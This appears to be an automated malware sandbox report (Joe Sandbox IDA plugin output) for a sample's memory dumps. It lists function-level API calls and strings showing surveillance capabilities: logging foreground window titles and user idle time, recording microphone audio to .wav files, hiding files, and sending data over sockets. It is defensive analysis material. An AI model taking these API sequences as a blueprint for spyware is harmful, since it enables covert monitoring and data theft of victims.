                                                                                                                                                                                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3658366068-0
                                                                                                                                                                                    • Opcode ID: 07f0d98998297438ede45d09b541bfa7804bc54575399a1cf176c2654ab79711
                                                                                                                                                                                    • Instruction ID: 48edf2cae809fd76e334b84a18644457c58eda1fea2cfd711e401a4d3c4dc07d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 07f0d98998297438ede45d09b541bfa7804bc54575399a1cf176c2654ab79711
                                                                                                                                                                                    • Instruction Fuzzy Hash: BF213532110B119FDB21AF26CC89B5AFBA2FF40726F104E19E1E211AF0CB61B851DB94
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                                                                    • API String ID: 2030045667-32948583
                                                                                                                                                                                    • Opcode ID: 937481c05c83497b1f6866385cf2d65ec121bb1444a5ac4e6fda0e952e19a296
                                                                                                                                                                                    • Instruction ID: d0e7e94e96178d81f6817485cacaa8fdf0c250b678b93b46523cc12823550620
                                                                                                                                                                                    • Opcode Fuzzy Hash: 937481c05c83497b1f6866385cf2d65ec121bb1444a5ac4e6fda0e952e19a296
                                                                                                                                                                                    • Instruction Fuzzy Hash: 42A1C8B4A24358CBDB21DA2CCC84BD8B6F4EF0A750F1448E5D5499B386CBB589C9CB51
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 15CAAD38
                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 15CAAD43
                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 15CAAD49
                                                                                                                                                                                    • GetWindowTextLengthW.USER32 ref: 15CAAD52
                                                                                                                                                                                    • GetWindowTextW.USER32 ref: 15CAAD86
                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 15CAAE54
                                                                                                                                                                                      • Part of subcall function 15CAA636: SetEvent.KERNEL32(00000000,?,00000000,15CAB20A,00000000), ref: 15CAA662
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                                                    • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                                                                    • API String ID: 911427763-3954389425
                                                                                                                                                                                    • Opcode ID: b5bd0b3375e6fc4f2a8b3101d81bd07275b0756c13fac98b1024a4b455631b3a
                                                                                                                                                                                    • Instruction ID: c9a3e9c74d14c23dd2535159b9a2fe991d924d06c3007365cf317ae19f6841cb
                                                                                                                                                                                    • Opcode Fuzzy Hash: b5bd0b3375e6fc4f2a8b3101d81bd07275b0756c13fac98b1024a4b455631b3a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3051B33B7082935BC314DF74DC94AAEBFA6BB84644F400D69E44682291FF64F945C792
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 0324A078
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 0324A08F
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 0324A095
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 0324A123
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 0324A12F
                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 0324A143
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • LoadLibraryExA, xrefs: 0324A085
                                                                                                                                                                                    • C:\Windows\System32\KernelBase.dll, xrefs: 0324A08A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Read$AddressHandleModuleProc
                                                                                                                                                                                    • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                                                                                                                    • API String ID: 1061262613-1650066521
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,15CA1D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 15CDA892
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,15CA1D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 15CDA89F
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 15CDA8A6
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,15CA1D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 15CDA8D2
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,15CA1D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 15CDA8DC
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 15CDA8E3
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,15CA1D55,?), ref: 15CDA926
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,15CA1D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 15CDA930
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 15CDA937
                                                                                                                                                                                    • _free.LIBCMT ref: 15CDA943
                                                                                                                                                                                    • _free.LIBCMT ref: 15CDA94A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2441525078-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?), ref: 15CA54BF
                                                                                                                                                                                    • GetMessageA.USER32 ref: 15CA556F
                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 15CA557E
                                                                                                                                                                                    • DispatchMessageA.USER32 ref: 15CA5589
                                                                                                                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,15D14F78), ref: 15CA5641
                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 15CA5679
                                                                                                                                                                                      • Part of subcall function 15CA4AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15CA4B36
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                                    • API String ID: 2956720200-749203953
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    • An unexpected memory leak has occurred. , xrefs: 03232690
                                                                                                                                                                                    • The unexpected small block leaks are:, xrefs: 03232707
                                                                                                                                                                                    • , xrefs: 03232814
                                                                                                                                                                                    • The sizes of unexpected leaked medium and large blocks are: , xrefs: 03232849
                                                                                                                                                                                    • Unexpected Memory Leak, xrefs: 032328C0
                                                                                                                                                                                    • bytes: , xrefs: 0323275D
                                                                                                                                                                                    • 7, xrefs: 032326A1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                                                                    • API String ID: 0-2723507874
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,15CF6FFF), ref: 15CF5F27
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DecodePointer
                                                                                                                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                    • API String ID: 3527080286-3064271455
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,0323C047,?,?,00000000,00000000), ref: 0323BDB2
                                                                                                                                                                                      • Part of subcall function 0323A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0323A79E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                    • API String ID: 4232894706-2493093252
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNEL32(00001388), ref: 15CAA740
                                                                                                                                                                                      • Part of subcall function 15CAA675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 15CAA6AB
                                                                                                                                                                                      • Part of subcall function 15CAA675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,15CAA74D), ref: 15CAA6BA
                                                                                                                                                                                      • Part of subcall function 15CAA675: Sleep.KERNEL32(00002710,?,?,?,15CAA74D), ref: 15CAA6E7
                                                                                                                                                                                      • Part of subcall function 15CAA675: CloseHandle.KERNEL32(00000000), ref: 15CAA6EE
                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 15CAA77C
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 15CAA78D
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 15CAA7A4
                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 15CAA81E
                                                                                                                                                                                      • Part of subcall function 15CBC485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 15CBC49E
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,15D06468,00000000,00000000,00000000), ref: 15CAA927
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                                    • String ID: `h1
                                                                                                                                                                                    • API String ID: 3795512280-1265431463
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 15CA79C5
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 15CA7A0D
                                                                                                                                                                                      • Part of subcall function 15CA4AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15CA4B36
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA7A4D
                                                                                                                                                                                    • MoveFileW.KERNEL32 ref: 15CA7A6A
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15CA7A95
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 15CA7AA5
                                                                                                                                                                                      • Part of subcall function 15CA4B96: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,15D14EF8,15CA4C49,00000000,00000000,00000000,00000000,15D14EF8,15CA4AC9), ref: 15CA4BA5
                                                                                                                                                                                      • Part of subcall function 15CA4B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,15CA548B), ref: 15CA4BC3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                                                    • String ID: .part
                                                                                                                                                                                    • API String ID: 1303771098-3499674018
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _strftime.LIBCMT ref: 15CA1D50
                                                                                                                                                                                      • Part of subcall function 15CA1A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 15CA1AD9
                                                                                                                                                                                    • waveInUnprepareHeader.WINMM(15D12A88,00000020,00000000), ref: 15CA1E02
                                                                                                                                                                                    • waveInPrepareHeader.WINMM(15D12A88,00000020), ref: 15CA1E40
                                                                                                                                                                                    • waveInAddBuffer.WINMM(15D12A88,00000020), ref: 15CA1E4F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                                                    • String ID: %Y-%m-%d %H.%M$.wav$jZos
                                                                                                                                                                                    • API String ID: 3809562944-19572097
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032343E7,?,?,032947C8,?,?,0325B7A8,03236575,0325A305), ref: 03234359
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 0323435F
                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,032343A8,00000002,?,00000000,00000000,?,032343E7,?,?,032947C8,?,?,0325B7A8,03236575,0325A305), ref: 03234374
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,032343A8,00000002,?), ref: 0323437A
                                                                                                                                                                                    • MessageBoxA.USER32 ref: 03234398
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileHandleWrite$Message
                                                                                                                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                    • API String ID: 1570097196-2970929446
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetConsoleCP.KERNEL32 ref: 15CEB3FE
                                                                                                                                                                                    • __fassign.LIBCMT ref: 15CEB479
                                                                                                                                                                                    • __fassign.LIBCMT ref: 15CEB494
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 15CEB4BA
                                                                                                                                                                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,15CEBB31,00000000), ref: 15CEB4D9
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,15CEBB31,00000000), ref: 15CEB512
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 15CF0C41: _free.LIBCMT ref: 15CF0C6A
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0F48
                                                                                                                                                                                      • Part of subcall function 15CE6782: HeapFree.KERNEL32(00000000,00000000), ref: 15CE6798
                                                                                                                                                                                      • Part of subcall function 15CE6782: GetLastError.KERNEL32(?,?,15CF0C6F,?,00000000,?,00000000,?,15CF0F13,?,00000007,?,?,15CF145E,?,?), ref: 15CE67AA
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0F53
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0F5E
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0FB2
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0FBD
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0FC8
                                                                                                                                                                                    • _free.LIBCMT ref: 15CF0FD3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                                    • Instruction ID: 9888bc1f66cfcf87a9048db7efbc992e69b2e693abd5440debb6b3905eddb51e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F114F79640B14AAD560AFB0CC45FCB7BECEF00F05F804C16AAEF76150DEA9BA449791
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0323ACF8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0323AD15
                                                                                                                                                                                      • Part of subcall function 0323ACF8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0323AD39
                                                                                                                                                                                      • Part of subcall function 0323ACF8: GetModuleFileNameA.KERNEL32(03230000,?,00000105), ref: 0323AD54
                                                                                                                                                                                      • Part of subcall function 0323ACF8: LoadStringA.USER32 ref: 0323ADEA
                                                                                                                                                                                    • CharToOemA.USER32 ref: 0323AEB7
                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0323AED4
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0323AEDA
                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,0323AF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0323AEEF
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,0323AF44,00000002,?), ref: 0323AEF5
                                                                                                                                                                                    • LoadStringA.USER32 ref: 0323AF17
                                                                                                                                                                                    • MessageBoxA.USER32 ref: 0323AF2D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 185507032-0
                                                                                                                                                                                    • Opcode ID: cc13b9300c497e5e8dcea8618d37a9df85b7c18229797c6ca83f440eb94cd5e7
                                                                                                                                                                                    • Instruction ID: 10743f644e0fd68fe8582ea65e16f084d889aa235bbd09964f75a3e6b9a9a7c5
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc13b9300c497e5e8dcea8618d37a9df85b7c18229797c6ca83f440eb94cd5e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 751170F9564305BED200F7A4DC85F9F73ECAB46740F404925B294DE0E0DAB4E9C48B66
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __allrem.LIBCMT ref: 15CDAC69
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 15CDAC85
                                                                                                                                                                                    • __allrem.LIBCMT ref: 15CDAC9C
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 15CDACBA
                                                                                                                                                                                    • __allrem.LIBCMT ref: 15CDACD1
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 15CDACEF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
